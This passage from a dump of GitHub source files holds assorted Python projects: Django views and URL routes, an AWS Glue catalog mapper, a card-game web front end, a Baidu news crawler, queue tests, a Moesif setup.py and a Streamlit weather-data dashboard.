id = int(id)\n        data = TCategory.objects.filter(id=id)\n        for i in data:\n            if read == 'true':\n                pt = Title.objects.filter(cate__id=i.id).order_by('count')[0:5]  # fetch the article objects\n            elif read == 'false':\n                pt = Title.objects.filter(cate__id=i.id).order_by('-count')[0:5]\n            elif time == 'true':\n                pt = Title.objects.filter(cate__id=i.id).order_by('publish_time')[0:5]\n            else:\n                pt = Title.objects.filter(cate__id=i.id).order_by('-publish_time')[0:5]\n            for article in pt:  # renamed from 'i', which shadowed the outer loop variable\n                list1.append(article)\n        return JsonResponse({\"list1\": list1, 'data': list(data)}, json_dumps_params={\"default\": my_default})\n    elif level == '1':\n        id = int(id)\n        data = TCategory.objects.filter(parnt_elevel=id)\n        for i in data:\n            if read == 'true':\n                pt = Title.objects.filter(cate__id=i.id).order_by('count')[0:5]\n            elif read == 'false':\n                pt = Title.objects.filter(cate__id=i.id).order_by('-count')[0:5]\n            elif time == 'true':\n                pt = Title.objects.filter(cate__id=i.id).order_by('publish_time')[0:5]\n            else:\n                pt = Title.objects.filter(cate__id=i.id).order_by('-publish_time')[0:5]\n            for article in pt:\n                list1.append(article)\n        return JsonResponse({\"list1\": list1, 'data': list(data)}, json_dumps_params={\"default\": my_default})\n    else:\n        if read == 'true':\n            title = Title.objects.all().order_by('count')[0:5]\n        elif read == 'false':\n            title = Title.objects.all().order_by('-count')[0:5]\n        elif time == 'true':\n            title = Title.objects.all().order_by('publish_time')[0:5]\n        else:\n            title = Title.objects.all().order_by('-publish_time')[0:5]\n        course_type = TCategory.objects.filter(level=2)\n        return JsonResponse({\"title\": list(title),'course_type':list(course_type)}, json_dumps_params={\"default\": my_default})\n\n\n\n\ndef home9(request):\n    t_all = Title.objects.all()\n    t_all2 = TCategory.objects.filter(level=2)\n    paginator = Paginator(t_all,5)\n    if request.method == \"GET\":\n        present_all = paginator.page(1)\n        return render(request,'courseapp/index.html',{'present_all':present_all})\n    if request.is_ajax():\n        page = request.GET.get(\"page\")\n        try:\n            present_all = paginator.page(page)\n        except PageNotAnInteger:\n            present_all = paginator.page(1)\n        except InvalidPage:\n            present_all = paginator.page(paginator.num_pages)\n        present_list = list(present_all.object_list.values())\n        return JsonResponse({\"t_all\": list(t_all),\"t_all2\":t_all2},json_dumps_params={\"default\": my_default})\n\n\n\n\n\n# Paginator\n# per_page: number of records shown per page\n# count: total number of records\n# num_pages: total number of pages\n# page_range: index range over the pages, e.g. (1,10), (1,200)\n# page: Page object -- page(2) is the object holding the second page of data\n#\n#\n# Page\n# has_next: whether there is a next page\n# has_previous: whether there is a previous page\n# next_page_number: number of the next page\n# previous_page_number: number of the previous page\n# object_list: list of the current page's records after pagination\n# number: the current page number\n# 
paginator:paginator对象,父类对象\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"filter69/course","sub_path":"courseapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"31311634051","text":"from typing import Generator\n\nimport boto3\n\nfrom resources.aws_resource import AWSResource\n\n\nclass GlueCatalog(AWSResource):\n\n def __init__(self, glue_catalog: dict, should_dump_json: bool = False) -> None:\n self.attr_map = {\"arn\": \"GlueCatalogArn\"}\n super().__init__(\"GlueCatalog\", glue_catalog, should_dump_json)\n\n\ndef retrieve_glue_catalog() -> Generator[GlueCatalog, None, None]:\n\n region: str = boto3.session.Session().region_name\n account_id: str = boto3.client(\"sts\").get_caller_identity().get(\"Account\")\n yield GlueCatalog({\n \"GlueCatalogArn\": f\"arn:aws:glue:{region}:{account_id}:catalog\"\n })\n","repo_name":"tgihf/aws-resource-mapper","sub_path":"resources/glue_catalog.py","file_name":"glue_catalog.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5202085165","text":"\nfrom genius_invocation.web.game.game import GeniusGame\nfrom genius_invocation.web.game.action import *\nfrom genius_invocation.utils import *\nimport genius_invocation.card.action as actioncard\nfrom genius_invocation.user_layout import layout\nfrom genius_invocation.web.utils_dict import get_dict\nimport js\nfrom pyodide import create_proxy\n\nfrom genius_invocation.web.get_card import get_card\n\nimport inspect\n\n\n\nelement_to_dice = {\n \"CRYO\": \"rgb(153,255,255)\",\n \"HYDRO\": \"rgb(58,90,186)\",\n \"PYRO\": \"rgb(255,153,153)\",\n \"ELECTRO\": \"rgb(144,53,144)\",\n \"ANEMO\": \"rgb(128,255,215)\",\n \"GEO\": \"rgb(255,230,153)\",\n \"DENDRO\": \"rgb(126,194,54)\",\n \"None\": \"rgb(187, 187, 187)\",\n \"OMNI\": \"rgb(255,221,245)\",\n}\n\nasync def main():\n\n get_card()\n\n available_card = []\n ignore = [actioncard.ActionCard, actioncard.EquipmentCard, actioncard.WeaponCard, actioncard.TalentCard, actioncard.ArtifactCard, actioncard.SupportCard, actioncard.FoodCard]\n for name, obj in inspect.getmembers(actioncard):\n if inspect.isclass(obj) and obj not in ignore:\n available_card.append((name, obj.name, obj.name_ch, obj))\n\n \n \n\n # js_available_card = {available_card[i][2]: available_card[i][0] for i in range(len(available_card))}\n # js.load_action_cards(create_proxy(js_available_card))\n select = []\n card_select = []\n cur_idx = 0\n while True:\n await asyncio.sleep(0.1)\n if js.document.getElementById('currentselect').innerText != '':\n select.append(js.document.getElementById('currentselect').innerText.split(' '))\n js.document.getElementById('currentselect').innerText = ''\n current_available_card = select_card(select[cur_idx], available_card)\n js.load_action_cards(create_proxy(current_available_card))\n if js.document.getElementById('current_select_card').innerText != '':\n card_select.append(js.document.getElementById('current_select_card').innerText.split(' '))\n js.document.getElementById('current_select_card').innerText = ''\n cur_idx += 1\n if cur_idx == 2:\n\n break\n while True:\n await asyncio.sleep(0.1)\n if js.document.getElementById('gamestatus').innerText != '':\n for item in js.document.getElementsByClassName('before'):\n item.style.display = 'none'\n break\n \n print(select)\n deck1 = {\n 'character': select[0],\n 'action_card': 
card_select[0]\n }\n deck2 = {\n 'character': select[1],\n 'action_card': card_select[1]\n }\n game = GeniusGame(player0_deck=deck1, player1_deck=deck2)\n information = []\n\n while not game.is_end:\n message = get_dict(game)\n\n\n game_information = message['game']\n game_inf_str = f\"回合: {game_information['round']}, 阶段: {game_information['round_phase']}, 当前玩家: {game_information['active_player']}, 先手玩家: {game_information['first_player']}\"\n active_player = game_information['active_player']\n js.document.getElementById('information').innerText = game_inf_str\n for i in range(2):\n js.document.getElementsByClassName(f'player{i}box')[0].style.borderColor = '#DDDDDD'\n js.document.getElementsByClassName(f'player{active_player}box')[0].style.borderColor = '#EE6622'\n # print(game.encode_message())\n print(message)\n for i, player in enumerate(['player0', 'player1']):\n hand_zone = message[i]['hand_zone']\n for idx in range(10):\n js.document.getElementById(f'{player}_card{idx}').innerText = ''\n for idx, item in enumerate(hand_zone):\n js.document.getElementById(f'{player}_card{idx}').innerText = item\n dice_zone = message[i]['dice_zone']\n for idx in range(16):\n js.document.getElementById(f'{player}_dice{idx}').innerText = ''\n js.document.getElementById(f'{player}_dice{idx}').style.background = '#00000000'\n for idx, item in enumerate(dice_zone):\n js.document.getElementById(f'{player}_dice{idx}').innerText = ''\n js.document.getElementById(f'{player}_dice{idx}').style.background = element_to_dice[item]\n\n card_num = message[i]['card_zone']\n card_num_place = js.document.getElementsByClassName(f'cardzone {player}')[0]\n card_num_place = card_num_place.getElementsByClassName('thetitle')[1]\n card_num_place.innerText = f'{card_num}'\n\n # 召唤物区\n summon_zone = message[i]['summon_zone']\n for idx in range(4):\n summon = js.document.getElementsByClassName(f'summon{idx} {player}')[0]\n summon.getElementsByClassName('thetitle')[0].innerText = f'召唤区{idx+1}'\n summon.getElementsByClassName('inneritem')[0].innerText = ''\n for idx, item in enumerate(summon_zone):\n summon = js.document.getElementsByClassName(f'summon{idx} {player}')[0]\n summon.getElementsByClassName('thetitle')[0].innerText = item[0]\n summon.getElementsByClassName('inneritem')[0].innerText = item[1]\n\n # 支援区\n support_zone = message[i]['support_zone']\n for idx in range(4):\n support = js.document.getElementsByClassName(f'support{idx} {player}')[0]\n support.getElementsByClassName('thetitle')[0].innerText = f'支援区{idx+1}'\n support.getElementsByClassName('inneritem')[0].innerText = ''\n for idx, item in enumerate(support_zone):\n support = js.document.getElementsByClassName(f'support{idx} {player}')[0]\n support.getElementsByClassName('thetitle')[0].innerText = item[0]\n support.getElementsByClassName('inneritem')[0].innerText = item[1]\n\n # 角色区\n character_zone = message[i]['character_zone']\n characters = [js.document.getElementsByClassName(f'character{j} {player}')[0] for j in range(3)]\n for idx, item in enumerate(character_zone):\n if item['base'][4]:\n characters[idx].style.borderColor = '#994400'\n else:\n characters[idx].style.borderColor = '#00000000'\n js.document.getElementById(f'{player}_character{idx}_element').style.background = element_to_dice[item['base'][0]]\n characters[idx].getElementsByClassName('thetitle')[0].innerText = item['base'][1]\n js.document.getElementById(f'{player}_character{idx}_health').innerText = item['base'][2]\n js.document.getElementById(f'{player}_character{idx}_power').innerText = 
item['base'][3]\n for skill_idx, skill in enumerate(item['skills']):\n js.document.getElementById(f'{player}_character{idx}_skill{skill_idx}').innerText = skill\n weapon_card = item.get('weapon', None)\n if weapon_card is None:\n js.document.getElementById(f'{player}_character{idx}_weapon').style.background = '#DDDDDD'\n js.document.getElementById(f'{player}_character{idx}_weapon_inner').innerText = '武器\\n(空)'\n else:\n js.document.getElementById(f'{player}_character{idx}_weapon').style.background = '#888888'\n js.document.getElementById(f'{player}_character{idx}_weapon_inner').innerText = '武器\\n' + weapon_card\n\n artifact_card = item.get('artifact', None)\n if artifact_card is None:\n js.document.getElementById(f'{player}_character{idx}_artifact').style.background = '#DDDDDD'\n js.document.getElementById(f'{player}_character{idx}_artifact_inner').innerText = '圣遗物\\n(空)'\n else:\n js.document.getElementById(f'{player}_character{idx}_artifact').style.background = '#888888'\n js.document.getElementById(f'{player}_character{idx}_artifact_inner').innerText = '圣遗物\\n' + artifact_card\n \n talent = item.get('talent', None)\n if talent is None:\n js.document.getElementById(f'{player}_character{idx}_talent').style.background = '#DDDDDD'\n js.document.getElementById(f'{player}_character{idx}_talent_inner').innerText = '天赋\\n(空)'\n else:\n js.document.getElementById(f'{player}_character{idx}_talent').style.background = '#888888'\n js.document.getElementById(f'{player}_character{idx}_talent_inner').innerText = '天赋\\n' + talent\n\n\n\n if len(item['status']) == 0:\n chara_state = '角色状态\\n(空)'\n else:\n chara_state = '角色状态\\n' + '\\n'.join(item['status'])\n js.document.getElementById(f'{player}_character{idx}_state_inner').innerText = chara_state\n\n if item['active'] == \"Active\":\n js.document.getElementById(f'{player}_character{idx}_group_state').style.display = 'inline-block'\n if len(item['shield']) == 0:\n shield_state = '护盾\\n(空)'\n else:\n shield_state = '护盾\\n' + '\\n'.join(item['shield'])\n if len(item['active_status']) == 0:\n active_state = '出战状态\\n(空)'\n else:\n active_state = '出战状态\\n' + '\\n'.join(item['active_status'])\n js.document.getElementById(f'{player}_character{idx}_group_state_inner').innerText = shield_state +'\\n' + active_state\n else:\n js.document.getElementById(f'{player}_character{idx}_group_state').style.display = 'none'\n \n\n\n action = await from_input(game)\n game.step(action)\n\n print_information(information)\n\nif __name__ == '__main__':\n main()","repo_name":"flick-ai/Genius-Invokation","sub_path":"genius_invocation/web/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10048,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"} +{"seq_id":"892570725","text":"from tkinter import * \nfrom tkinter.ttk import *\nfrom pygame import mixer\n \n# Inicializo sonido y ventana\nmixer.init() \nroot = Tk()\nframe = Frame(root)\nframe.pack()\n\nbottomframe = Frame(root)\nbottomframe.pack( side = BOTTOM )\n\nsound = mixer.Sound('applause-1.wav')\n \n# Adding widgets to the root window\nLabel(frame, text = 'Test lin', font =(\n 'Verdana', 15)).pack(side = TOP, pady = 10)\n \n\nphoto = PhotoImage(file = r\"a.png\")\nphotoimage = photo.subsample(3, 3)\n\nphoto1 = PhotoImage(file = r\"i.png\")\nphotoimage1 = photo1.subsample(3, 3)\n\nphoto2 = PhotoImage(file = r\"m.png\")\nphotoimage2 = photo2.subsample(3, 3)\n\nphoto3 = PhotoImage(file = r\"u.png\")\nphotoimage3 = photo3.subsample(3, 3)\n\nphoto4 = PhotoImage(file = 
r\"s.png\")\nphotoimage4 = photo4.subsample(3, 3)\n\nphoto5 = PhotoImage(file = r\"sh.png\")\nphotoimage5 = photo5.subsample(3, 3)\n\n\ndef display_sound():\n\tprint(\"Avion fue presionado\")\n\tsound.play()\n\ndef display_sound1():\n\tprint(\"Raton fue presionado\")\n\tsound.play()\n\ndef display_sound2():\n\tprint(\"Helado fue presionado\")\n\tsound.play()\n# here, image option is used to\n# set image on button\n# compound option is used to align\n# image on LEFT side of button\nButton(frame, image = photoimage, compound = LEFT, command=display_sound).pack(side = LEFT)\nButton(frame, image = photoimage1, compound = RIGHT, command=display_sound1).pack(side = LEFT) \nButton(frame, image = photoimage2, compound = RIGHT, command=display_sound2).pack(side = LEFT)\nButton(frame, image = photoimage3, compound = RIGHT, command=display_sound2).pack(side = BOTTOM)\nButton(frame, image = photoimage4, compound = RIGHT, command=display_sound2).pack(side = LEFT)\nButton(frame, image = photoimage5, compound = RIGHT, command=display_sound2).pack(side = LEFT)\nmainloop()\n","repo_name":"sibarras/julieta_sound_tester","sub_path":"num_1/ejemplos gui/window1v1.2.py","file_name":"window1v1.2.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17783852702","text":"# Задача 26: Напишите программу, которая на вход принимает два числа A и B, и возводит число А в целую степень B с помощью рекурсии.\n# def power(a,b):\n# if b==1:\n# return a\n# else:\n# return a*power(a,b-1)\n \n# a = int(input('Введите число, которое хотите возвести в степень: '))\n# b = int(input('Введите степень, в которую необходимо возвести число: '))\n# if b==0:\n# print(a,' в степени ',b,' равно 1')\n# else:\n# print(a,' в степени ',b,' равно ',power(a,b))\n\n\n# Задача 28: Напишите рекурсивную функцию sum(a, b), возвращающую сумму двух целых неотрицательных чисел. Из всех арифметических операций допускаются только +1 и -1. Также нельзя использовать циклы.\ndef check(a): #Проверка введенного значения на наличие каких-либо символов, кроме требуемых.\n ab_set = {'1', '2', '3', '4', '5', '6', '7', '8', '9', '0'}\n a_set = a\n a_set = set(list(a_set)).union(ab_set)\n if a_set != ab_set:\n print('Попробуйте еще раз! 
Необходимо целое неотрицательное число.')\n quit()\n \ndef rec(d):\n if d==0:\n return 0\n else:\n return 1+(rec(d-1))\n\na = input('Введите первое слагаемое (целое неотрицательное число): ')\ncheck(a)\nc = int(a)\n\na = input('Введите второе слагаемое (целое неотрицательное ��исло): ')\ncheck(a)\nd = int(a)\n\nprint('Сумма ',c,' и ',d,' равна ',rec(d)+c)\n","repo_name":"Deevilynn/HWPY5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28192856177","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nroot_mod = '/home/xxguo/Project/crawler'\nsys.path.append(root_mod)\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport re\nimport time\nimport random\nfrom lxml import etree\nfrom datetime import datetime\nfrom urllib import quote, unquote\n#from bs4 import BeautifulSoup\nfrom scheduler.crawler import Crawler, export, Scheduler\nfrom models.search.model import SearchArticleModel\nfrom utils.readability import Readability\nfrom crawlerimpl.zjld.processdata import HandleUrl , HandleContent, \\\n get_urls_re, get_charset, clear_label, clear_space, new_time, \\\n local2utc, get_code, clear_a\n\n\ndef _get_url(url, code='utf-8'):\n time.sleep(random.randint(0,3))\n html_stream = get_urls_re(url, time = 6)\n cod = get_code(url)\n try:\n if cod:\n html_stream.encoding = cod.get('encoding', code)\n else:\n html_stream.encoding = get_charset(html_stream.text)\n if html_stream.status_code != 200:\n return html_stream\n except:\n pass\n return html_stream\n\nclass EventCrawler(Crawler):\n\n type = \"zjld.baidu.newstitle\"\n\n @staticmethod\n def init(conf=None):\n\n from xlutils.copy import copy\n import xlrd\n import os\n SRC_PATH = os.path.dirname(__file__)\n bk = xlrd.open_workbook(os.path.join(SRC_PATH,\n \"../../file/event.xls\"))\n sh = bk.sheet_by_name('Sheet1')\n nrows = sh.nrows\n ncols = sh.ncols\n for i in xrange(1,nrows):\n\n source_type = sh.cell_value(i,1).strip()\n if source_type == '':\n continue\n data = {\n 'source_type': source_type,\n }\n \n key = sh.cell_value(i,0).strip()\n Scheduler.schedule(EventCrawler.type ,key=str(key), \n data=data, interval=7200, reset=True)\n weibo = \"zjld.weibo.newstitle\"\n Scheduler.schedule(weibo ,key=str(key), \n data=data, interval=21600, reset=True)\n weixin = \"zjld.sogou.keywords\"\n Scheduler.schedule(weixin ,key=str(key), \n data=data, interval=7200, reset=True)\n\n def crawl(self): \n worlds = str(self.key)\n world = '+'.join(worlds.split(','))\n data = self.data\n homepage = \"http://news.baidu.com/ns?ct=0&rn=20&ie=utf-8&bs=\"+world+\"&\\\n rsv_bp=1&sr=0&cl=2&f=8&prevct=no&tn=news&word=\"+world\n # homepage = \"http://news.baidu.com/ns?ct=0&rn=20&ie=utf-8&bs=intitle:\\\n # (\"+world+\")&rsv_bp=1&sr=0&cl=2&f=8&\\\n # prevct=no&tn=newstitle&word=\"+world\n homepage = clear_space(homepage)\n html_stream = _get_url(str(homepage))\n xp_content = \"//div[@id='content_left']/ul/li\"\n items = HandleContent.get_item(html_stream,xp_content)\n xp_title = \"h3[@class='c-title']//text()\"\n xp_str = \"div//p[@class='c-author']/text()\"\n #xp_str = \"div[@class='c-title-author']/text()\"\n xp_url = \"h3[@class='c-title']/a/@href\"\n xp_count = \"div//span[@class='c-info']/a[@class='c-more_link']/text()\"\n for item in items:\n date = new_time()\n title = HandleContent.get_context(item,xp_title,text=True)\n pt_text = HandleContent.get_context(item,xp_str,text=True)\n publisher = 
HandleContent.get_author(pt_text, xp_text='', STR=True)\n            pubtime = HandleContent.find_pubtime(pt_text)\n            pubtime = local2utc(pubtime) if pubtime else date.get('utctime')\n            url = HandleContent.get_context(item,xp_url,text=True)\n            count = HandleContent.get_context(item,xp_count,text=True)\n            try:\n                count = int(count.split(u'条相同新闻',1)[0]) if count else 0\n            except:\n                count = 0\n            crawl_data = {\n                'title': title,\n                'pubtime': pubtime,\n                'source': u'baidu',\n                'publisher': publisher,\n                'count': str(count),\n                'key': world,\n                'source_type': data.get('source_type', ''),\n            }\n            Scheduler.schedule(ContentCrawler.type ,key=url,\n                data=crawl_data)\n\nclass ContentCrawler(Crawler):\n    type = \"zjld.baidu.newscontent\"\n\n    def crawl(self):\n        data = self.data\n        url = str(self.key)\n        html_stream = _get_url(url)\n        soup = Readability(html_stream.text, url)\n        content = soup.content\n        comment = {}\n        try:\n            text = HandleContent.get_BScontext(content, text=True).text\n            comment['content'] = clear_space(text)\n        except:\n            # make sure the key exists, otherwise the comment['content'] check below\n            # raises KeyError whenever extraction fails\n            content = ''\n            comment['content'] = ''\n        comment['count'] = data.get('count','')\n        date = new_time()\n        crawl_data = {\n            'title': data.get('title', ''),\n            'pubtime': data.get('pubtime', datetime.utcfromtimestamp(0)),\n            'source': 'baidu',\n            'publisher': data.get('publisher'),\n            'crtime_int': date.get('crtime_int'),\n            'crtime': date.get('crtime'),\n            'origin_source': u'百度搜索',\n            'url': url,\n            'key': data.get('key', ''),\n            'type': u'元搜索',\n            'source_type': data.get('source_type', ''),\n            'content': content,\n            'comment': comment,\n        }\n        if comment['content']:\n            model = SearchArticleModel(crawl_data)\n            export(model)\n\nif __name__ == \"__main__\":\n    # key = '通用点火系统缺陷致大规模召回危机'\n    # EventCrawler(key=key).crawl()\n    url = 'http://china.huanqiu.com/hot/2015-03/5990111.html'\n    ContentCrawler(key=url).crawl()\n    # EventCrawler.init()\n","repo_name":"xxguo/crawler","sub_path":"crawlerimpl/search/baidu.py","file_name":"baidu.py","file_ext":"py","file_size_in_byte":6192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"4898916793","text":"from code_challenges.stack_and_queue.queue import Queue\nimport pytest\n\ndef test_is_queue():\n    q = Queue()\n    assert q\n\ndef test_is_empty():\n    q = Queue()\n    actual = q.is_empty()\n    expected = True\n    assert actual == expected\n\ndef test_peek_queue():\n    q = Queue()\n    with pytest.raises(ValueError):\n        q.peek()\n\ndef test_en_q():\n    q = Queue()\n    q.enq(\"Bubba Gump\")\n    actual = q.peek()\n    expected = \"Bubba Gump\"\n    assert actual == expected\n\ndef test_de_q_empty():\n    q = Queue()\n    with pytest.raises(ValueError):\n        q.deq()\n\ndef test_de_q():  # renamed: this was a second 'test_de_q_empty', which shadowed the test above\n    q = Queue()\n    q.enq(\"Dog\")\n    actual = q.deq()\n    expected = \"Dog\"\n    assert actual == expected\n\ndef test_multiple_en_q():\n    q = Queue()\n    q.enq(\"Bubba Gump\")\n    q.enq(\"Shrimp Company\")\n    q.deq()\n    actual = q.peek()\n    expected = \"Shrimp Company\"\n    assert actual == expected\n\ndef test_multiple_en_q_even_more():\n    q = Queue()\n    q.enq(\"Bubba Gump\")\n    q.enq(\"Shrimp Company\")\n    q.enq(\"Blobby\")\n    q.enq(\"Trommpping\")\n    q.deq()\n    q.deq()\n    q.deq()\n    actual = q.peek()\n    expected = \"Trommpping\"\n    assert actual == expected\n
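# --- Added sketch (not in the original test file): the enq/deq/peek scenarios above ---
# repeat the same shape with different data; pytest.mark.parametrize (using the
# 'pytest' already imported at the top of this file) makes them table-driven.
# The test name and the scenario table are illustrative, not from the repo:
@pytest.mark.parametrize('items, dequeues, expected_peek', [
    (['Bubba Gump', 'Shrimp Company'], 1, 'Shrimp Company'),
    (['Bubba Gump', 'Shrimp Company', 'Blobby', 'Trommpping'], 3, 'Trommpping'),
])
def test_peek_after_dequeues(items, dequeues, expected_peek):
    q = Queue()
    for item in items:
        q.enq(item)
    for _ in range(dequeues):
        q.deq()
    assert q.peek() == expected_peek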
\ndef test_multiple_dn_q():\n    q = Queue()\n    q.enq(\"Bubba Gump\")\n    q.enq(\"Shrimp Company\")\n    q.deq()\n    q.deq()\n    with pytest.raises(ValueError):\n        q.peek()\n\ndef test_multiple_dn_q_is_empty():\n    q = Queue()\n    q.enq(\"Bubba Gump\")\n    q.enq(\"Shrimp Company\")\n    q.deq()\n    q.deq()\n    actual = q.is_empty()\n    expected = True\n    assert actual == expected  # was 'assert actual == True', leaving 'expected' unused\n\ndef test_dequeue():\n    q = Queue()\n    q.enq(\"apple\")\n    q.enq(\"banana\")\n    actual = q.deq()\n    expected = \"apple\"\n    assert actual == expected\n","repo_name":"spamuelranek/data-structures-and-algorithms","sub_path":"python/tests/test_queue.py","file_name":"test_queue.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"6715799431","text":"from tkinter import *\r\nimport sqlite3\r\nconn = sqlite3.connect('phone.db')\r\ncurse = conn.cursor()\r\nmain = Tk()\r\nmain.geometry(\"298x323\")\r\ndef create_table():\r\n    curse.execute('CREATE TABLE IF NOT EXISTS phone(name TEXT, number REAL)')\r\ncreate_table()\r\nname_entry = Entry(main)\r\nname_entry.grid(row=1,column=5)\r\n\r\nmain.mainloop()\r\n","repo_name":"vpranav99/python-projects-","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"86458800658","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'userrequests'\n\nurlpatterns = [\n\n    # requests/\n    url(r'^$', views.IndexList.as_view(), name='index'),\n\n    # requests/462/\n    url(r'^(?P<pk>[0-9]+)/$', views.Detail.as_view(), name='detail'),\n\n    # requests/searchres/\n    url(r'^searchres/$', views.SearchView.as_view(), name='search'),\n\n    # requests/463/discussion/\n    url(r'^(?P<pk>[0-9]+)/discussion/$', views.Discussion.as_view(), name='reqdiscusion'),\n\n    # requests/create/\n    url(r'^create/$', views.Create.as_view(), name='create'),\n\n    # requests/345/update\n    url(r'^(?P<pk>[0-9]+)/update/$', views.Update.as_view(), name='update'),\n\n    # login/\n    url(r'^login/$', views.UserLogin.as_view(), name='login'),\n\n    # register/\n    url(r'^register/$', views.UserFormView.as_view(), name='register'),\n\n    # logout/\n    url(r'^logout/$', views.UserLogout, name='user-logout'),\n\n]\n","repo_name":"Task14/BDO","sub_path":"userrequests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"43309841194","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n    setup module.\n    See:\n    https://packaging.python.org/en/latest/distributing.html\n    https://github.com/pypa/sampleproject\n\n\"\"\"\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nlong_description = ''\nif path.exists(path.join(here, 'README.md')):\n    with open(path.join(here, 'README.md'), encoding='utf-8') as f:\n        long_description = f.read()\n\nsetup(\n    name='moesifdjango',\n\n    # Versions should comply with PEP440. 
For a discussion on single-sourcing\n # the version across setup.py and the project code, see\n # https://packaging.python.org/en/latest/single_source_version.html\n version='2.3.6',\n\n description='Moesif Middleware for Python Django',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n \n # The project's main homepage.\n url='https://www.moesif.com/docs/server-integration/django/',\n\n # Author details\n author='Moesif, Inc',\n author_email='derric@moesif.com',\n\n license='Apache Software License',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 4 - Beta',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Internet :: Log Analysis',\n 'Topic :: Software Development :: Debuggers',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Internet :: WWW/HTTP',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: Apache Software License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n\n keywords='log analysis restful api development debug',\n\n # You can just specify the packages manually here if your project is\n # simple. Or you can use find_packages().\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n\n # List run-time dependencies here. These will be installed by pip when\n # your project is installed. For an analysis of \"install_requires\" vs pip's\n # requirements files see:\n # https://packaging.python.org/en/latest/requirements.html\n install_requires=['requests', 'jsonpickle', 'python-dateutil', 'isodatetimehandler', 'moesifapi>=1.4.1',\n 'moesifpythonrequest>=0.3.0', 'apscheduler', 'nose'],\n\n # List additional groups of dependencies here (e.g. development\n # dependencies). 
You can install these using the following syntax,\n # for example:\n # $ pip install -e .[dev,test]\n extras_require={\n 'dev': [],\n 'test': ['nose'],\n },\n\n)\n","repo_name":"Moesif/moesifdjango","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"625617813","text":"#from os import name\nimport streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n# Meine Imports\nimport database_conn\nimport my_code_snippets\nimport bokeh_map_test\n\n#print(st.__version__) ## ==> 0.82.0 ist wichtig für Bokeh Link: https://github.com/streamlit/streamlit/issues/1226\ndef main():\n st.write(\"\"\"\n # WI4Future Database\n \"\"\")\n\n ## Interaktive Karte\n if st.button('Zeige Geo-Karte'):\n st.write(\"\"\"\n ## Letze Daten von Messtationen\n \"\"\")\n p = bokeh_map_test.create_map()\n st.bokeh_chart(p, use_container_width=True)\n\n ## Auswahl der Daten nach Namen\n name_list= database_conn.querry_names()\n name = st.selectbox('Select name', name_list, index=8)\n\n st.write(f\"\"\"\n ## Datensätze von {name}\n \"\"\")\n df = pd.DataFrame(database_conn.get_values(name), columns=['Time','Ort','Temperatur','Feuchte','Druck'])\n st.dataframe(df.sort_index(ascending=False))\n # DOWNLOAD\n st.markdown(my_code_snippets.get_table_download_link(df, name), unsafe_allow_html=True)\n \n st.write(f\"\"\"\n ## Chronologisches Diagramm der Wetterdaten von {name}\n \"\"\")\n new_df = df[df.Time > pd.to_datetime(\"23/5/2021\")] #Dataframe nur mit Daten seit diesem Jahr \n\n fig = make_subplots(rows=2, cols=1)\n fig.add_trace(go.Scatter(x=new_df.Time, y=new_df.Temperatur, name='Temperatur'), row=1, col=1)\n fig.add_trace(go.Scatter(x=new_df.Time, y=new_df.Feuchte, name='Feuchte'), row=1, col=1)\n fig.add_trace(go.Scatter(x=new_df.Time, y=new_df.Druck, name='Druck'), row=2, col=1)\n st.plotly_chart(fig, use_container_width=True)\n\n st.write(\"\"\"\n ## Graph mit ID als X-Achse\n Falls die Zeitdaten nicht richtig erfasst wurden kann es vorkommen, dass der obere Graph nicht angezeigt wird. 
